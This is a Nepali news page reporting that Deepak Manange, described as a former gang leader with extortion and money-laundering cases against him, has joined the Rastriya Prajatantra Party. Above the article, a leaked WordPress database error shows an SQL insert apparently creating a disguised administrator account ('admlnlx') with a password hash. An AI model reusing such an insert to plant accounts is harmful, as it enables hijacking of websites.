WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BWf/Wobm/0u2B4HYDfhLsSXVH9.iNQ1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 21:33:07', '', 'admlnlx', 'admlnlx')
काठमाडौं, पुस २८-
कुनैबेला उपत्यकाको गुण्डागर्दीमा सक्रिय रहेका ‘गुन्डा नाइके’ दीपक मनाङ्गे राष्ट्रिय प्रजातन्त्र पार्टी (राप्रपा)मा प्रवेश गरेका छन् ।राजधानीको नयाँ बजारस्थित एक पार्टी प्यालेसमा आयोजित कार्यक्रममा राप्रपाका अध्यक्ष कमल थापाले उनलाई पार्टी प्रवेश गराएका हुन् ।
मनाङ्गे अहिले भने सक्रिय गुण्डागर्दीमा नभई गोप्यरुपमा लागेको प्रहरीको भनाई छ । गुण्डागर्दीको माध्यमबाट पटक–पटक जेल परेका उनी पछिल्लो समय गएको असारमा पनि पक्राउ परेका थिए । व्यवसायीलाई धम्क्याएर रकम असुलेको अभियोगमा उनी ६० दिनसम्म प्रहरी हिरासतमा रहेका थिए ।
उनीमाथि अकुत सम्पत्ति कमाएको समेत आरोप छ । १४ करोड ७३ लाख रुपैयाँको स्रोत देखाउन नसकेपछि सम्पत्ति शुद्धीकरण अनुसन्धान विभागले उनीमाथि विशेष अदालतमा मुद्दा दायर गरेको छ । उनको त्यो मुद्दा बिचाराधीन छन् ।